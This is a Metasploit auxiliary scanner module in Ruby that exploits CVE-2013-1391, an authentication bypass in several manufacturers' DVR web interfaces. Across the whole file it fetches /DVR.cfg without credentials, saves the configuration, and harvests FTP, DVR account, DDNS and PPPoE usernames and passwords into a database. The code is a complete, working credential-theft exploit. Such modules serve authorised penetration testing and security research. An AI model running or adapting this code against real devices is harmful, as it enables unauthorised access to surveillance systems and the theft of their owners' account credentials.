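##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Scanner module: fetches /DVR.cfg over HTTP (no authentication is required by
# the affected firmware), stores the configuration as loot, and records the
# credentials it contains (FTP, DVR user accounts, DDNS, PPPoE) plus a 'dvr'
# service entry in the database.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',
      'Description' => %q{
        This module takes advantage of an authentication bypass vulnerability at the
        web interface of multiple manufacturers DVR systems, which allows to retrieve the
        device configuration.
      },
      'Author' =>
        [
          'Alejandro Ramos', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-1391' ],
          [ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]
        ],
      'License' => MSF_LICENSE
    )
  end

  # Records the PPPoE account from the configuration as a note.
  # Nothing is recorded when PPPoE is explicitly disabled (PPPOE_EN=0) or when
  # either the user or the password is absent/empty.
  #
  # @param conf [String] raw DVR.cfg contents
  # @return [void]
  def get_pppoe_credentials(conf)
    return if conf_value(conf, /PPPOE_EN=(\d)/) == '0'

    user = conf_value(conf, /PPPOE_USER=(.*)/)
    password = conf_value(conf, /PPPOE_PASSWORD=(.*)/)
    return if user.empty? || password.empty?

    info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}"

    # Kept as a note (not a credential) as before: there is no service/port on
    # the target to attach a login to. The note stores the secret in plaintext.
    report_note({
      :host => rhost,
      :data => info,
      :type => "dvr.pppoe.conf",
      :sname => 'pppoe',
      :update => :unique_data
    })
  end

  # Records the DDNS account from the configuration as a note.
  # Nothing is recorded when DDNS is explicitly disabled (DDNS_EN=0) or when
  # no hostname is configured; an empty user/password is still recorded.
  #
  # @param conf [String] raw DVR.cfg contents
  # @return [void]
  def get_ddns_credentials(conf)
    return if conf_value(conf, /DDNS_EN=(\d)/) == '0'

    hostname = conf_value(conf, /DDNS_HOSTNAME=(.*)/)
    return if hostname.empty?

    user = conf_value(conf, /DDNS_USER=(.*)/)
    password = conf_value(conf, /DDNS_PASSWORD=(.*)/)
    info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}"

    report_note({
      :host => rhost,
      :data => info,
      :type => "dvr.ddns.conf",
      :sname => 'ddns',
      :update => :unique_data
    })
  end

  # Records the FTP upload account from the configuration as a credential
  # against the configured FTP server. Nothing is recorded when FTP_SERVER
  # is absent/empty.
  #
  # @param conf [String] raw DVR.cfg contents
  # @return [void]
  def get_ftp_credentials(conf)
    server = conf_value(conf, /FTP_SERVER=(.*)/)
    return if server.empty?

    # NOTE(review): FTP_SERVER is passed through as the service address; it may
    # be a hostname rather than an IP, and FTP_PORT is the raw string from the
    # file. Both are handed to the DB unchanged, as the original code did.
    # The proof is the entire configuration, so it also contains every other
    # secret in the file.
    report_cred(
      ip: server,
      port: conf_value(conf, /FTP_PORT=(.*)/),
      service_name: 'ftp',
      user: conf_value(conf, /FTP_USER=(.*)/),
      password: conf_value(conf, /FTP_PASSWORD=(.*)/),
      proof: conf.inspect
    )
  end

  # Creates a service, a credential core and an UNTRIED login for it.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return [Metasploit::Credential::Login, nil] whatever
  #   create_credential_login returns
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Records every USERn_USERNAME/USERn_PASSWORD pair in the configuration as a
  # credential against the DVR web service itself. Disabled accounts
  # (USERn_LOGIN=0) are still recorded; the flag is only kept in the proof.
  #
  # @param conf [String] raw DVR.cfg contents
  # @return [void]
  def get_dvr_credentials(conf)
    # user_id is always a run of digits (captured by \d+), so interpolating it
    # into the regexes below cannot change their structure.
    conf.scan(/USER(\d+)_USERNAME/).flatten.uniq.each do |user_id|
      active = conf_value(conf, /USER#{user_id}_LOGIN=(.*)/)
      user = conf_value(conf, /USER#{user_id}_USERNAME=(.*)/)
      password = conf_value(conf, /USER#{user_id}_PASSWORD=(.*)/)

      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'dvr',
        user: user,
        password: password,
        proof: "user_id: #{user_id}, active: #{active}"
      )
    end
  end

  # Scanner entry point for a single host.
  #
  # @param ip [String] target address (the helpers use rhost/rport)
  # @return [void]
  def run_host(ip)
    res = send_request_cgi({
      'uri' => '/DVR.cfg',
      'method' => 'GET'
    })

    # Only a 200 with a non-empty body that mentions CAMERA counts as a hit;
    # anything else (error page, empty file, unrelated content) is ignored.
    unless res && res.code == 200 && !res.body.empty? && res.body.match?(/CAMERA/)
      vprint_error("#{rhost}:#{rport} - DVR configuration not found")
      return
    end

    conf = res.body

    loot_path = store_loot("dvr.configuration", "text/plain", rhost, conf, "DVR.cfg")
    vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{loot_path}")

    get_ftp_credentials(conf)
    get_dvr_credentials(conf)
    get_ddns_credentials(conf)
    get_pppoe_credentials(conf)

    dvr_name = conf_value(conf, /DVR_NAME=(.*)/)

    report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")
    print_good("#{rhost}:#{rport} DVR #{dvr_name} found")
  end

  private

  # Returns the first capture group of +pattern+ in +conf+, or "" when the
  # pattern does not match. The callers treat a missing key the same as an
  # empty value, which is what the original per-method "" defaults did.
  #
  # @param conf [String] raw DVR.cfg contents
  # @param pattern [Regexp] pattern with exactly one capture group
  # @return [String]
  def conf_value(conf, pattern)
    conf[pattern, 1] || ''
  end
end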